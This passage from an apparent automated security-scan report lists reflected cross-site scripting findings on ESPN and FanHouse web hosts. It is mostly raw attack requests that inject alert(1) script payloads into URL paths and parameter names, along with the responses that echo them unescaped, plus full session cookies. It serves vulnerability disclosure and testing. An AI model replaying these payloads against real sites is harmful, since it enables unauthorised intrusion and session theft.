DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17807 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/endd1f8<script>alert(1)</script>3870a2a6f26/frontpage</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cad91<script>alert(1)</script>aea9d8a4290 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pokerpickem/en/frontpagecad91<script>alert(1)</script>aea9d8a4290 HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17804 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/frontpagecad91<script>alert(1)</script>aea9d8a4290</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a748f<script>alert(1)</script>f8c10452a72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pokerpickem/ena748f<script>alert(1)</script>f8c10452a72/group HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17803 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/ena748f<script>alert(1)</script>f8c10452a72/group</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d225d<script>alert(1)</script>ba2a1fa4d8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pokerpickem/en/groupd225d<script>alert(1)</script>ba2a1fa4d8d HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17800 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/groupd225d<script>alert(1)</script>ba2a1fa4d8d</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 60154<script>alert(1)</script>a8449528d68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pokerpickem/en60154<script>alert(1)</script>a8449528d68/story HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17803 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/en60154<script>alert(1)</script>a8449528d68/story</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 98bbc<script>alert(1)</script>d41001c2763 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pokerpickem/en/story98bbc<script>alert(1)</script>d41001c2763 HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17800 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/story98bbc<script>alert(1)</script>d41001c2763</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1a591<script>alert(1)</script>4469738f57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/blog1a591<script>alert(1)</script>4469738f57 HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 133 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/blog1a591<script>alert(1)</script>4469738f57</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f2f55<script>alert(1)</script>52656a339f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/indexf2f55<script>alert(1)</script>52656a339f6 HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 135 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/indexf2f55<script>alert(1)</script>52656a339f6</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d0146<script>alert(1)</script>35faeff8fe6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/newsd0146<script>alert(1)</script>35faeff8fe6 HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 134 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/newsd0146<script>alert(1)</script>35faeff8fe6</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 941a2<script>alert(1)</script>9a411c627fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/rumorcentral941a2<script>alert(1)</script>9a411c627fc HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 142 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/rumorcentral941a2<script>alert(1)</script>9a411c627fc</BODY></HTML>
2.37. http://insider.espn.go.com/insider/rumorcentral [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://insider.espn.go.com
Path:
/insider/rumorcentral
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eba35"><script>alert(1)</script>2279e161389 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/rumorcentral?eba35"><script>alert(1)</script>2279e161389=1 HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dfccc<script>alert(1)</script>5419d7c4d6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/sportindexdfccc<script>alert(1)</script>5419d7c4d6a HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 140 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/sportindexdfccc<script>alert(1)</script>5419d7c4d6a</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b753<script>alert(1)</script>9c552fecda5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /soccer3b753<script>alert(1)</script>9c552fecda5/ HTTP/1.1 Host: m.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 129 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/soccer3b753<script>alert(1)</script>9c552fecda5/</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57344<script>alert(1)</script>4ba2aaa9554 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wireless57344<script>alert(1)</script>4ba2aaa9554/ HTTP/1.1 Host: m.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 131 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/wireless57344<script>alert(1)</script>4ba2aaa9554/</BODY></HTML>
2.41. http://ncaafootball.fanhouse.com/2010/11/06/joe-paterno-wins-400th-game/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ncaafootball.fanhouse.com
Path:
/2010/11/06/joe-paterno-wins-400th-game/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3850"-alert(1)-"30dea48b6b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/11/06/joe-paterno-wins-400th-game/?b3850"-alert(1)-"30dea48b6b2=1 HTTP/1.1 Host: ncaafootball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
2.42. http://ncaafootball.fanhouse.com/2010/11/06/joe-paterno-wins-400th-game/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ncaafootball.fanhouse.com
Path:
/2010/11/06/joe-paterno-wins-400th-game/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 195fb"><script>alert(1)</script>26925aa0a54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/06/joe-paterno-wins-400th-game/?195fb"><script>alert(1)</script>26925aa0a54=1 HTTP/1.1 Host: ncaafootball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 58f10<script>alert(1)</script>c39bdb4f674 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /outdoors/bassmaster/members58f10<script>alert(1)</script>c39bdb4f674/insider/resources/column HTTP/1.1 Host: proxy.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; s_sess=%20s_v3%3D2010_nbati_xxx_xxx_xxx_xxx%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D94%3B; CRBLM_LAST_UPDATE=1289009493; ESPN360beta=betaSet; userAB=7; lang=en; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009663777%7C1383617663777%3B%20s_c24_s%3DFirst%2520Visit%7C1289011463777%3B%20s_gpv_pn%3Despn%253Ancf%253Aindex%7C1289011463789%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 174 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CAO DSP CURi ADM DEV TAIi PSA PSD IVAi IVDi CONi OUR DELi SAMi BUS PHY ONL UNI COM NAV DEM CNT STA PRE Pool: pool-ESPN_proxy_bassmaster Via: 8810-09/10
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/outdoors/bassmaster/members58f10<script>alert(1)</script>c39bdb4f674/insider/resources/column</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 633a0<script>alert(1)</script>c2ca6d34533 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /outdoors/bassmaster/members633a0<script>alert(1)</script>c2ca6d34533/insider/story HTTP/1.1 Host: proxy.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; s_sess=%20s_v3%3D2010_nbati_xxx_xxx_xxx_xxx%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D94%3B; CRBLM_LAST_UPDATE=1289009493; ESPN360beta=betaSet; userAB=7; lang=en; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009663777%7C1383617663777%3B%20s_c24_s%3DFirst%2520Visit%7C1289011463777%3B%20s_gpv_pn%3Despn%253Ancf%253Aindex%7C1289011463789%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 163 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CAO DSP CURi ADM DEV TAIi PSA PSD IVAi IVDi CONi OUR DELi SAMi BUS PHY ONL UNI COM NAV DEM CNT STA PRE Pool: pool-ESPN_proxy_bassmaster Via: 8810-09/10
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/outdoors/bassmaster/members633a0<script>alert(1)</script>c2ca6d34533/insider/story</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bbdd3<script>alert(1)</script>ee5a32b7b1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
